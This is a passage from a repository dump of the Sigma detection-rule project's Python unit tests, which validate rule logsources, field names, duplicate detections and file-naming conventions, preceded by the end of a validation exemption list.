number_as_string\n    9a025188-6f2d-42f8-bb2f-d3a83d24a5af: number_as_string\n    # specific_instead_of_generic_logsource\n    23b71bc5-953e-4971-be4c-c896cda73fc2: specific_instead_of_generic_logsource\n    693a44e9-7f26-4cb6-b787-214867672d3a: specific_instead_of_generic_logsource\n    8ac03a65-6c84-4116-acad-dc1558ff7a77: specific_instead_of_generic_logsource\n    c3e5c1b1-45e9-4632-b242-27939c170239: specific_instead_of_generic_logsource\n    # SigmahqCategoryWindowsProviderNameIssue\n    3f3f3506-1895-401b-9cc3-e86b16e630d0: sigmahq_category_windows_provider_name\n    7dc2dedd-7603-461a-bc13-15803d132355: sigmahq_category_windows_provider_name\n    # SigmahqInvalidHashKvIssue\n    b69888d4-380c-45ce-9cf9-d9ce46e67821: sigmahq_invalid_hash_kv\n    # SigmahqRedundantFieldIssue\n    0f06a3a5-6a09-413f-8743-e6cf35561297: sigmahq_redundant_field\n    f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7: 
sigmahq_redundant_field\n    # InvalidATTACKTagIssue remove after pySigma 1.0.0 release\n    afd12fed-b0ec-45c9-a13d-aa86625dac81: attacktag\n"
  },
  {
    "path": "tests/test_logsource.py",
    "content": "#!/usr/bin/env python3\n\"\"\"\nChecks for logsource or fieldname errors on all rules\n\nRun using the command\n# python test_logsource.py\n\"\"\"\n\nimport os\nimport unittest\nimport yaml\nfrom colorama import init\nfrom colorama import Fore\nimport json\n\n\nclass TestRules(unittest.TestCase):\n    path_to_rules_ = [\n        \"rules\",\n        \"rules-emerging-threats\",\n        \"rules-placeholder\",\n        \"rules-threat-hunting\",\n        \"rules-compliance\",\n    ]\n    path_to_rules = []\n    for path_ in path_to_rules_:\n        path_to_rules.append(\n            os.path.join(os.path.dirname(os.path.realpath(__name__)), path_)\n        )\n\n    # Helper functions\n    def yield_next_rule_file_path(self, path_to_rules: list) -> str:\n        for path_ in path_to_rules:\n            for root, _, files in os.walk(path_):\n                for file in files:\n                    if file.endswith(\".yml\"):\n                        yield os.path.join(root, file)\n\n    def get_rule_yaml(self, file_path: str) -> dict:\n        data = []\n\n        with open(file_path, encoding=\"utf-8\") as f:\n            yaml_parts = yaml.safe_load_all(f)\n            for part in yaml_parts:\n                data.append(part)\n\n        return data\n\n    def get_rule_part(self, file_path: str, part_name: str):\n        yaml_dicts = self.get_rule_yaml(file_path)\n        for yaml_part in yaml_dicts:\n            if part_name in yaml_part.keys():\n                return yaml_part[part_name]\n\n        return None\n\n    def get_detection_field(self, detection: dict):\n        data = []\n\n        def get_field_name(selection: dict):\n            name = []\n            for field in selection:\n                if field == \"|all\":\n                    continue\n                elif \"|\" in field:\n                    name.append(field.split(\"|\")[0])\n                else:\n                    name.append(field)\n            return name\n\n        for 
search_identifier in detection:\n            if isinstance(detection[search_identifier], dict):\n                data += get_field_name(detection[search_identifier])\n            if isinstance(detection[search_identifier], list):\n                for list_value in detection[search_identifier]:\n                    if isinstance(list_value, dict):\n                        data += get_field_name(list_value)\n\n        return data\n\n    def full_logsource(self, logsource: dict) -> dict:\n        data = {}\n\n        data[\"product\"] = (\n            logsource[\"product\"] if \"product\" in logsource.keys() else None\n        )\n        data[\"category\"] = (\n            logsource[\"category\"] if \"category\" in logsource.keys() else None\n        )\n        data[\"service\"] = (\n            logsource[\"service\"] if \"service\" in logsource.keys() else None\n        )\n\n        return data\n\n    def exist_logsource(self, logsource: dict) -> bool:\n        # Check that the product is known\n        if logsource[\"product\"]:\n            if logsource[\"product\"] in fieldname_dict.keys():\n                product = logsource[\"product\"]\n            else:\n                return False\n        else:\n            product = \"empty\"\n\n        if (\n            logsource[\"category\"]\n            and logsource[\"category\"] in fieldname_dict[product][\"category\"].keys()\n        ):\n            return True\n        elif (\n            logsource[\"service\"]\n            and logsource[\"service\"] in fieldname_dict[product][\"service\"].keys()\n        ):\n            return True\n        elif logsource[\"category\"] == None and logsource[\"service\"] == None:\n            return True  # We know the product but it has no category or service\n\n        return False\n\n    def get_logsource(self, logsource: dict) -> list:\n        data = None\n\n        product = (\n            logsource[\"product\"]\n            if logsource[\"product\"] in fieldname_dict.keys()\n         
   else \"empty\"\n        )\n\n        if (\n            logsource[\"category\"]\n            and logsource[\"category\"] in fieldname_dict[product][\"category\"].keys()\n        ):\n            data = fieldname_dict[product][\"category\"][logsource[\"category\"]]\n        elif (\n            logsource[\"service\"]\n            and logsource[\"service\"] in fieldname_dict[product][\"service\"].keys()\n        ):\n            data = fieldname_dict[product][\"service\"][logsource[\"service\"]]\n        elif logsource[\"category\"] == None and logsource[\"service\"] == None:\n            data = fieldname_dict[product][\"empty\"]\n\n        return data\n\n    def not_commun(self, logsource: dict, data: list) -> bool:\n        product = (\n            logsource[\"product\"]\n            if logsource[\"product\"] in fieldname_dict.keys()\n            else \"empty\"\n        )\n\n        if fieldname_dict[product][\"common\"] == data:\n            return False\n        else:\n            return True\n\n    #\n    # test functions\n    #\n    def test_invalid_logsource_attributes(self):\n        faulty_rules = []\n        valid_logsource = [\n            \"category\",\n            \"product\",\n            \"service\",\n            \"definition\",\n        ]\n\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            logsource = self.get_rule_part(file_path=file, part_name=\"logsource\")\n            if not logsource:\n                print(Fore.RED + \"Rule {} has no 'logsource'.\".format(file))\n                faulty_rules.append(file)\n                continue\n            valid = True\n            for key in logsource:\n                if key not in valid_logsource:\n                    print(\n                        Fore.RED\n                        + \"Rule {} has a logsource with an invalid field ({})\".format(\n                            file, key\n                        )\n                    )\n                    valid = False\n  
              elif not isinstance(logsource[key], str):\n                    print(\n                        Fore.RED\n                        + \"Rule {} has a logsource with an invalid field type ({})\".format(\n                            file, key\n                        )\n                    )\n                    valid = False\n            if not valid:\n                faulty_rules.append(file)\n\n        self.assertEqual(\n            faulty_rules,\n            [],\n            Fore.RED\n            + \"There are rules with non-conform 'logsource' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#log-source\",\n        )\n\n    def test_logsource_value(self):\n        faulty_rules = []\n\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            logsource = self.get_rule_part(file_path=file, part_name=\"logsource\")\n            if logsource:\n                full_logsource = self.full_logsource(logsource)\n                if not self.exist_logsource(full_logsource):\n                    faulty_rules.append(file)\n                    print(\n                        Fore.RED\n                        + \"Rule {} has the unknown logsource product/category/service ({}/{}/{})\".format(\n                            file,\n                            full_logsource[\"product\"],\n                            full_logsource[\"category\"],\n                            full_logsource[\"service\"],\n                        )\n                    )\n\n        self.assertEqual(\n            faulty_rules,\n            [],\n            Fore.RED + \"There are rules with non-conform 'logsource' values.\",\n        )\n\n    def test_fieldname_case(self):\n        files_with_fieldname_issues = []\n\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            logsource = self.get_rule_part(file_path=file, part_name=\"logsource\")\n            detection = self.get_rule_part(file_path=file, 
part_name=\"detection\")\n\n            if logsource and detection:\n                full_logsource = self.full_logsource(logsource)\n                list_valid = self.get_logsource(full_logsource)\n                first_time = True\n\n                if list_valid and self.not_commun(full_logsource, list_valid):\n                    for field in self.get_detection_field(detection):\n                        if field not in list_valid:\n                            print(\n                                Fore.RED\n                                + \"Rule {} has the invalid field <{}>\".format(\n                                    file, field\n                                )\n                            )\n                            if first_time:\n                                files_with_fieldname_issues.append(file)\n                                first_time = False  # there can be many errors in the same rule\n\n        self.assertEqual(\n            files_with_fieldname_issues,\n            [],\n            Fore.RED\n            + \"There are rule files which contain unknown fields or cast errors\",\n        )\n\n\ndef load_fields_json(name: str):\n    data = {}\n\n    file_path = os.path.abspath(os.path.dirname(__file__)) + \"/\" + name\n    with open(file_path, \"r\") as file:\n        json_dict = json.load(file)\n\n    for product in json_dict[\"legit\"]:\n        data[product] = json_dict[\"legit\"][product]\n\n    for product in json_dict[\"addon\"]:\n        for category in json_dict[\"addon\"][product][\"category\"]:\n            data[product][\"category\"][category] += json_dict[\"addon\"][product][\n                \"category\"\n            ][category]\n        for service in json_dict[\"addon\"][product][\"service\"]:\n            data[product][\"service\"][service] += json_dict[\"addon\"][product][\"service\"][\n                service\n            ]\n\n    # We use some extracted hash\n    # Add the common fields to every category and service\n    for product in data:\n        for category in data[product][\"category\"]:\n            # if \"Hashes\" in data[product][\"category\"][category]:\n            #     data[product][\"category\"][category] += [\n            #         \"md5\",\n            #         \"sha1\",\n            #         \"sha256\",\n            #         \"Imphash\",\n            #     ]\n            # if (\n            #     \"Hash\" in data[product][\"category\"][category]\n            # ):  # Sysmon 15 create_stream_hash\n            #     data[product][\"category\"][category] += [\n            #         \"md5\",\n            #         \"sha1\",\n            #         \"sha256\",\n            #         \"Imphash\",\n            #     ]\n            if \"common\" in data[product].keys():\n                data[product][\"category\"][category] += data[product][\"common\"]\n        for service in data[product][\"service\"]:\n            if \"common\" in data[product].keys():\n                data[product][\"service\"][service] += data[product][\"common\"]\n\n    return data\n\n\nif __name__ == \"__main__\":\n    init(autoreset=True)\n    # load field name information\n    fieldname_dict = load_fields_json(\"logsource.json\")\n\n    # Run the tests\n    unittest.main()\n"
  },
  {
    "path": "tests/test_rules.py",
    "content": "#!/usr/bin/env python3\n\"\"\"\nChecks for noncompliance or common errors on all rules\n\nRun using the command\n# python test_rules.py\n\"\"\"\n\nimport os\nimport unittest\nimport yaml\nimport re\nimport string\n\n# from attackcti import attack_client\nfrom colorama import init\nfrom colorama import Fore\nimport collections\n\n\n# Old Tests cover by pySigma 0.10.9 and simgma-cli 0.7.10\n# Use sigma check --fail-on-error --fail-on-issues --validation-config tests/sigma_cli_conf.yml rules*\n#\n\n\nclass TestRules(unittest.TestCase):\n    # @classmethod\n    # def setUpClass(cls):\n    #     print(\"Calling get_mitre_data()\")\n    #     # Get Current Data from MITRE ATT&CK®\n    #     cls.MITRE_ALL = get_mitre_data()\n    #     print(\"Catched data - starting tests...\")\n\n    # MITRE_TECHNIQUE_NAMES = [\n    #     \"process_injection\",\n    #     \"signed_binary_proxy_execution\",\n    #     \"process_injection\",\n    # ]  # incomplete list\n    # MITRE_TACTICS = [\n    #     \"initial_access\",\n    #     \"execution\",\n    #     \"persistence\",\n    #     \"privilege_escalation\",\n    #     \"defense_evasion\",\n    #     \"credential_access\",\n    #     \"discovery\",\n    #     \"lateral_movement\",\n    #     \"collection\",\n    #     \"exfiltration\",\n    #     \"command_and_control\",\n    #     \"impact\",\n    #     \"launch\",\n    # ]\n    # # Don't use trademarks in rules - they require non-ASCII characters to be used on we don't want them in our rules\n    TRADE_MARKS = {\"MITRE ATT&CK\", \"ATT&CK\"}\n\n    path_to_rules = [\n        \"rules\",\n        \"rules-emerging-threats\",\n        \"rules-placeholder\",\n        \"rules-threat-hunting\",\n        \"rules-compliance\",\n    ]\n\n    # Helper functions\n    def yield_next_rule_file_path(self, path_to_rules: list) -> str:\n        for path_ in path_to_rules:\n            for root, _, files in os.walk(path_):\n                for file in files:\n                    if 
file.endswith(\".yml\"):\n                        yield os.path.join(root, file)\n\n    def get_rule_part(self, file_path: str, part_name: str):\n        yaml_dicts = self.get_rule_yaml(file_path)\n        for yaml_part in yaml_dicts:\n            if part_name in yaml_part.keys():\n                return yaml_part[part_name]\n\n        return None\n\n    def get_rule_yaml(self, file_path: str) -> dict:\n        data = []\n\n        with open(file_path, encoding=\"utf-8\") as f:\n            yaml_parts = yaml.safe_load_all(f)\n            for part in yaml_parts:\n                data.append(part)\n\n        return data\n\n    # Tests\n    def test_legal_trademark_violations(self):\n        # See issue https://github.com/SigmaHQ/sigma/issues/1028\n        files_with_legal_issues = []\n\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            with open(file, \"r\", encoding=\"utf-8\") as fh:\n                file_data = fh.read()\n                for tm in self.TRADE_MARKS:\n                    if tm in file_data:\n                        files_with_legal_issues.append(file)\n\n        self.assertEqual(\n            files_with_legal_issues,\n            [],\n            Fore.RED\n            + \"There are rule files which contain a trademark or reference that doesn't comply with the respective trademark requirements - please remove the trademark to avoid legal issues\",\n        )\n\n    # sigma cli SigmahqFieldDuplicateValueIssue\n    # def test_look_for_duplicate_filters(self):\n    #     def check_list_or_recurse_on_dict(item, depth: int, special: bool) -> None:\n    #         if type(item) == list:\n    #             check_if_list_contain_duplicates(item, depth, special)\n    #         elif type(item) == dict and depth <= MAX_DEPTH:\n    #             for keys, sub_item in item.items():\n    #                 if (\n    #                     \"|base64\" in keys or \"|re\" in keys\n    #                 ):  # Covers both \"base64\" 
and \"base64offset\" modifiers, and \"re\" modifier\n    #                     check_list_or_recurse_on_dict(sub_item, depth + 1, True)\n    #                 else:\n    #                     check_list_or_recurse_on_dict(sub_item, depth + 1, special)\n\n    #     def check_if_list_contain_duplicates(\n    #         item: list, depth: int, special: bool\n    #     ) -> None:\n    #         try:\n    #             # We use a list comprehension to convert all the element to lowercase. Since we don't care about casing in SIGMA except for the following modifiers\n    #             #   - \"base64offset\"\n    #             #   - \"base64\"\n    #             #   - \"re\"\n    #             if special:\n    #                 item_ = item\n    #             else:\n    #                 item_ = [i.lower() for i in item]\n    #             if len(item_) != len(set(item_)):\n    #                 # We find the duplicates and then print them to the user\n    #                 duplicates = [\n    #                     i\n    #                     for i, count in collections.Counter(item_).items()\n    #                     if count > 1\n    #                 ]\n    #                 print(\n    #                     Fore.RED\n    #                     + \"Rule {} has duplicate filters {}\".format(file, duplicates)\n    #                 )\n    #                 files_with_duplicate_filters.append(file)\n    #         except:\n    #             # unhashable types like dictionaries\n    #             for sub_item in item:\n    #                 if type(sub_item) == dict and depth <= MAX_DEPTH:\n    #                     check_list_or_recurse_on_dict(sub_item, depth + 1, special)\n\n    #     MAX_DEPTH = 3\n    #     files_with_duplicate_filters = []\n\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         check_list_or_recurse_on_dict(detection, 1, False)\n\n 
   #     self.assertEqual(\n    #         files_with_duplicate_filters,\n    #         [],\n    #         Fore.RED + \"There are rules with duplicate filters\",\n    #     )\n\n    #sigma cli SigmahqFieldWithSpaceIssue\n    # def test_field_name_with_space(self):\n    #     def key_iterator(fields, faulty):\n    #         for key, value in fields.items():\n    #             if \" \" in key:\n    #                 faulty.append(key)\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a space in field name ({}).\".format(file, key)\n    #                 )\n    #             if type(value) == dict:\n    #                 key_iterator(value, faulty)\n\n    #     faulty_fieldnames = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         key_iterator(detection, faulty_fieldnames)\n\n    #     self.assertEqual(\n    #         faulty_fieldnames,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with an unsupported field name. Spaces are not allowed. 
(Replace space with an underscore character '_' )\",\n    #     )\n\n    #sigma cli AllOfThemConditionIssue\n    # def test_single_named_condition_with_x_of_them(self):\n    #     faulty_detections = []\n\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         yaml = self.get_rule_yaml(file_path=file)\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n\n    #         has_them_in_condition = \"them\" in detection[\"condition\"]\n    #         has_only_one_named_condition = len(detection) == 2\n    #         not_multipart_yaml_file = len(yaml) == 1\n\n    #         if (\n    #             has_them_in_condition\n    #             and has_only_one_named_condition\n    #             and not_multipart_yaml_file\n    #         ):\n    #             faulty_detections.append(file)\n\n    #     self.assertEqual(\n    #         faulty_detections,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules using '1/all of them' style conditions but only have one condition\",\n    #     )\n\n    def test_duplicate_detections(self):\n        def compare_detections(detection1: dict, detection2: dict) -> bool:\n            # If they have different log sources. 
They can't be the same\n            # We first remove the definition field (if present) from the logsource so typos there don't affect the comparison\n            detection1[\"logsource\"].pop(\"definition\", None)\n            detection2[\"logsource\"].pop(\"definition\", None)\n\n            if detection1[\"logsource\"] != detection2[\"logsource\"]:\n                return False\n\n            # detections with a different number of entries can't be the same\n            if len(detection1) != len(detection2):\n                return False\n\n            for named_condition in detection1:\n                # don't check timeframes\n                if named_condition == \"timeframe\":\n                    continue\n\n                # condition clause must be the same too\n                if named_condition == \"condition\":\n                    if detection1[\"condition\"] != detection2[\"condition\"]:\n                        return False\n                    else:\n                        continue\n\n                # Named condition must exist in both rule files\n                if named_condition not in detection2:\n                    return False\n\n                # can't be the same if the lengths differ\n                if len(detection1[named_condition]) != len(detection2[named_condition]):\n                    return False\n\n                for condition in detection1[named_condition]:\n                    if type(condition) != str:\n                        return False\n\n                    if condition not in detection2[named_condition]:\n                        return False\n\n                    # Keyword rules use no field names, so the parser returns a list instead of a dict\n                    # If the two lists differ, the detections aren't the same\n                    if (type(detection1[named_condition]) == list) or (\n                        type(detection2[named_condition]) == list\n                    ):\n                        condition_value1 = detection1[named_condition]\n                        condition_value2 = detection2[named_condition]\n                    else:\n                        condition_value1 = detection1[named_condition][condition]\n                        condition_value2 = detection2[named_condition][condition]\n\n                    if condition_value1 != condition_value2:\n                        return False\n\n            return True\n\n        faulty_detections = []\n        files_and_their_detections = {}\n\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n            logsource = self.get_rule_part(file_path=file, part_name=\"logsource\")\n            detection[\"logsource\"] = {}\n            detection[\"logsource\"].update(logsource)\n            yaml = self.get_rule_yaml(file_path=file)\n\n            is_multipart_yaml_file = len(yaml) != 1\n            if is_multipart_yaml_file:\n                continue\n\n            for key in files_and_their_detections:\n                if compare_detections(detection, files_and_their_detections[key]):\n                    faulty_detections.append((key, file))\n\n            files_and_their_detections[file] = detection\n\n        self.assertEqual(\n            faulty_detections,\n            [],\n            Fore.YELLOW + \"There are rule files with exactly the same detection logic.\",\n        )\n\n    def test_source_eventlog(self):\n        faulty_detections = []\n\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            detection = self.get_rule_part(file_path=file, 
part_name=\"detection\")\n            detection_str = str(detection).lower()\n            if \"'source': 'eventlog'\" in detection_str:\n                faulty_detections.append(file)\n\n        self.assertEqual(\n            faulty_detections,\n            [],\n            Fore.YELLOW\n            + \"There are detections with 'Source: Eventlog'. This does not add value to the detection.\",\n        )\n\n    def test_event_id_instead_of_process_creation(self):\n        faulty_detections = []\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            with open(file, encoding=\"utf-8\") as f:\n                for line in f:\n                    if (\n                        re.search(r\".*EventID: (?:1|4688)\\s*$\", line)\n                        and file not in faulty_detections\n                    ):\n                        detection = self.get_rule_part(\n                            file_path=file, part_name=\"detection\"\n                        )\n                        if detection:\n                            for search_identifier in detection:\n                                if isinstance(detection[search_identifier], dict):\n                                    for field in detection[search_identifier]:\n                                        if \"Provider_Name\" in field:\n                                            if isinstance(\n                                                detection[search_identifier][\n                                                    \"Provider_Name\"\n                                                ],\n                                                list,\n                                            ):\n                                                for value in detection[\n                                                    search_identifier\n                                                ][\"Provider_Name\"]:\n                                                    if (\n                           
                             \"Microsoft-Windows-Security-Auditing\"\n                                                        in value\n                                                        or \"Microsoft-Windows-Sysmon\"\n                                                        in value\n                                                    ):\n                                                        if (\n                                                            file\n                                                            not in faulty_detections\n                                                        ):\n                                                            faulty_detections.append(\n                                                                file\n                                                            )\n                                            else:\n                                                if (\n                                                    \"Microsoft-Windows-Security-Auditing\"\n                                                    in detection[search_identifier][\n                                                        \"Provider_Name\"\n                                                    ]\n                                                    or \"Microsoft-Windows-Sysmon\"\n                                                    in detection[search_identifier][\n                                                        \"Provider_Name\"\n                                                    ]\n                                                ):\n                                                    if file not in faulty_detections:\n                                                        faulty_detections.append(file)\n\n        self.assertEqual(\n            faulty_detections,\n            [],\n            Fore.YELLOW\n            + \"There are rules still using Sysmon 1 or Event ID 4688. 
Please migrate to the process_creation category.\",\n        )\n\n    def test_sysmon_rule_without_eventid(self):\n        faulty_rules = []\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            logsource = self.get_rule_part(file_path=file, part_name=\"logsource\")\n            if logsource:\n                service = logsource.get(\"service\", \"\")\n                if service.lower() == \"sysmon\":\n                    with open(file, encoding=\"utf-8\") as f:\n                        found = False\n                        for line in f:\n                            # might be on a single line or in multiple lines\n                            if re.search(r\".*EventID:.*$\", line):\n                                found = True\n                                break\n                        if not found:\n                            faulty_rules.append(file)\n\n        self.assertEqual(\n            faulty_rules,\n            [],\n            Fore.RED\n            + \"There are rules using sysmon events but with no EventID specified\",\n        )\n\n    # sigma cli SigmahqFalsepositivesCapitalIssue\n    # def test_optional_falsepositives_capital(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         fps = self.get_rule_part(file_path=file, part_name=\"falsepositives\")\n    #         if fps:\n    #             for fp in fps:\n    #                 # first letter should be capital\n    #                 try:\n    #                     if fp[0].upper() != fp[0]:\n    #                         print(\n    #                             Fore.YELLOW\n    #                             + \"Rule {} defines a falsepositive that does not start with a capital letter: '{}'.\".format(\n    #                                 file, fp\n    #                             )\n    #                         )\n    #                         faulty_rules.append(file)\n    #              
   except TypeError as err:\n    #                     print(\"TypeError Exception for rule {}\".format(file))\n    #                     print(\"Error: {}\".format(err))\n    #                     print(\"Maybe you created an empty falsepositive item?\")\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with false positives that don't start with a capital letter (e.g. 'unknown' should be 'Unknown')\",\n    #     )\n\n    # sigma cli SigmahqFalsepositivesBannedWordIssue\n    # def test_optional_falsepositives_blocked_content(self):\n    #     faulty_rules = []\n    #     banned_words = [\"none\", \"pentest\", \"penetration test\"]\n    #     common_typos = [\"unkown\", \"ligitimate\", \"legitim \", \"legitimeate\"]\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         fps = self.get_rule_part(file_path=file, part_name=\"falsepositives\")\n    #         if fps:\n    #             for fp in fps:\n    #                 for typo in common_typos:\n    #                     if fp == \"Unknow\" or typo in fp.lower():\n    #                         print(\n    #                             Fore.YELLOW\n    #                             + \"Rule {} defines a falsepositive with a common typo: '{}'.\".format(\n    #                                 file, typo\n    #                             )\n    #                         )\n    #                         faulty_rules.append(file)\n    #                 for banned_word in banned_words:\n    #                     if banned_word in fp.lower():\n    #                         print(\n    #                             Fore.YELLOW\n    #                             + \"Rule {} defines a falsepositive with an invalid reason: '{}'.\".format(\n    #                                 file, banned_word\n    #                             )\n    #                         )\n    #                         
faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with invalid false positive definitions (e.g. Pentest, None or common typos)\",\n    #     )\n\n    def test_optional_license(self):\n        faulty_rules = []\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            license_str = self.get_rule_part(file_path=file, part_name=\"license\")\n            if license_str:\n                if not isinstance(license_str, str):\n                    print(\n                        Fore.YELLOW\n                        + \"Rule {} has a malformed 'license' (has to be a string).\".format(\n                            file\n                        )\n                    )\n                    faulty_rules.append(file)\n\n        self.assertEqual(\n            faulty_rules,\n            [],\n            Fore.RED\n            + \"There are rules with malformed 'license' fields. 
(has to be a string)\",\n        )\n\n    # sigma cli SigmaReferencesError\n    # def test_references(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         references = self.get_rule_part(file_path=file, part_name=\"references\")\n    #         # Reference field doesn't exist\n    #         # if not references:\n    #         # print(Fore.YELLOW + \"Rule {} has no field 'references'.\".format(file))\n    #         # faulty_rules.append(file)\n    #         if references:\n    #             # it exists but isn't a list\n    #             if not isinstance(references, list):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a references field that isn't a list.\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed 'references' fields. 
(has to be a list of values even if it contains only a single value)\",\n    #     )\n\n    # sigma cli SigmahqLinkDescriptionIssue\n    # def test_references_in_description(self):\n    #     # This test checks for the presence of links and special keywords in the \"description\" field while there is no \"references\" field.\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         references = self.get_rule_part(file_path=file, part_name=\"references\")\n    #         # Reference field doesn't exist\n    #         if not references:\n    #             descriptionfield = self.get_rule_part(\n    #                 file_path=file, part_name=\"description\"\n    #             )\n    #             if descriptionfield:\n    #                 for i in [\n    #                     \"http://\",\n    #                     \"https://\",\n    #                     \"internal research\",\n    #                 ]:  # Extend the list with other common reference starters\n    #                     if i in descriptionfield.lower():\n    #                         print(\n    #                             Fore.RED\n    #                             + \"Rule {} has a field that contains references to external links but no references set. Add a 'references' key and add URLs as list items.\".format(\n    #                                 file\n    #                             )\n    #                         )\n    #                         faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed 'description' fields. (links and external references have to be in a separate field named 'references'. 
see specification https://github.com/SigmaHQ/sigma-specification)\",\n    #     )\n\n    def test_file_names(self):\n        faulty_rules = []\n        name_lst = []\n        filename_pattern = re.compile(r\"[a-z0-9_]{10,90}\\.yml\")\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            filename = os.path.basename(file)\n            if filename in name_lst:\n                print(Fore.YELLOW + \"Rule {} is a duplicate file name.\".format(file))\n                faulty_rules.append(file)\n            elif filename[-4:] != \".yml\":\n                print(\n                    Fore.YELLOW + \"Rule {} has an invalid extension (.yml).\".format(file)\n                )\n                faulty_rules.append(file)\n            elif len(filename) > 90:\n                print(\n                    Fore.YELLOW + \"Rule {} has a file name too long >90.\".format(file)\n                )\n                faulty_rules.append(file)\n            elif len(filename) < 14:\n                print(\n                    Fore.YELLOW + \"Rule {} has a file name too short <14.\".format(file)\n                )\n                faulty_rules.append(file)\n            elif filename_pattern.match(filename) is None or \"_\" not in filename:\n                print(\n                    Fore.YELLOW\n                    + \"Rule {} has a file name that doesn't match our standard.\".format(\n                        file\n                    )\n                )\n                faulty_rules.append(file)\n            else:\n                # This test makes sure that every rule has a filename that corresponds to\n                # its specific logsource.\n                # Fix Issue #1381 (https://github.com/SigmaHQ/sigma/issues/1381)\n                logsource = self.get_rule_part(file_path=file, part_name=\"logsource\")\n                if logsource:\n                    pattern_prefix = \"\"\n                    os_infix = \"\"\n                    os_bool = False\n 
                   for key, value in logsource.items():\n                        if key == \"definition\":\n                            pass\n                        else:\n                            if key == \"product\":\n                                # This is to get the OS for certain categories\n                                if value == \"windows\":\n                                    os_infix = \"win_\"\n                                elif value == \"macos\":\n                                    os_infix = \"macos_\"\n                                elif value == \"linux\":\n                                    os_infix = \"lnx_\"\n                                # For other stuff\n                                elif value == \"aws\":\n                                    pattern_prefix = \"aws_\"\n                                elif value == \"azure\":\n                                    pattern_prefix = \"azure_\"\n                                elif value == \"gcp\":\n                                    pattern_prefix = \"gcp_\"\n                                elif value == \"m365\":\n                                    pattern_prefix = \"microsoft365_\"\n                                elif value == \"okta\":\n                                    pattern_prefix = \"okta_\"\n                                elif value == \"onelogin\":\n                                    pattern_prefix = \"onelogin_\"\n                                elif value == \"github\":\n                                    pattern_prefix = \"github_\"\n                                elif value == \"fortinet\":\n                                    pattern_prefix = \"fortinet_\"\n                            elif key == \"category\":\n                                if value == \"process_creation\":\n                                    pattern_prefix = \"proc_creation_\"\n                                    os_bool = True\n                                elif value == 
\"image_load\":\n                                    pattern_prefix = \"image_load_\"\n                                elif value == \"file_event\":\n                                    pattern_prefix = \"file_event_\"\n                                    os_bool = True\n                                elif value == \"registry_set\":\n                                    pattern_prefix = \"registry_set_\"\n                                elif value == \"registry_add\":\n                                    pattern_prefix = \"registry_add_\"\n                                elif value == \"registry_event\":\n                                    pattern_prefix = \"registry_event_\"\n                                elif value == \"registry_delete\":\n                                    pattern_prefix = \"registry_delete_\"\n                                elif value == \"registry_rename\":\n                                    pattern_prefix = \"registry_rename_\"\n                                elif value == \"process_access\":\n                                    pattern_prefix = \"proc_access_\"\n                                    os_bool = True\n                                elif value == \"driver_load\":\n                                    pattern_prefix = \"driver_load_\"\n                                    os_bool = True\n                                elif value == \"dns_query\":\n                                    pattern_prefix = \"dns_query_\"\n                                    os_bool = True\n                                elif value == \"ps_script\":\n                                    pattern_prefix = \"posh_ps_\"\n                                elif value == \"ps_module\":\n                                    pattern_prefix = \"posh_pm_\"\n                                elif value == \"ps_classic_start\":\n                                    pattern_prefix = \"posh_pc_\"\n                                elif value == \"pipe_created\":\n        
                            pattern_prefix = \"pipe_created_\"\n                                elif value == \"network_connection\":\n                                    pattern_prefix = \"net_connection_\"\n                                    os_bool = True\n                                elif value == \"file_rename\":\n                                    pattern_prefix = \"file_rename_\"\n                                    os_bool = True\n                                elif value == \"file_delete\":\n                                    pattern_prefix = \"file_delete_\"\n                                    os_bool = True\n                                elif value == \"file_change\":\n                                    pattern_prefix = \"file_change_\"\n                                    os_bool = True\n                                elif value == \"file_access\":\n                                    pattern_prefix = \"file_access_\"\n                                    os_bool = True\n                                elif value == \"create_stream_hash\":\n                                    pattern_prefix = \"create_stream_hash_\"\n                                elif value == \"create_remote_thread\":\n                                    pattern_prefix = \"create_remote_thread_win_\"\n                                elif value == \"dns\":\n                                    pattern_prefix = \"net_dns_\"\n                                elif value == \"firewall\":\n                                    pattern_prefix = \"net_firewall_\"\n                                elif value == \"webserver\":\n                                    pattern_prefix = \"web_\"\n                            elif key == \"service\":\n                                if value == \"auditd\":\n                                    pattern_prefix = \"lnx_auditd_\"\n                                elif value == \"modsecurity\":\n                                    pattern_prefix = 
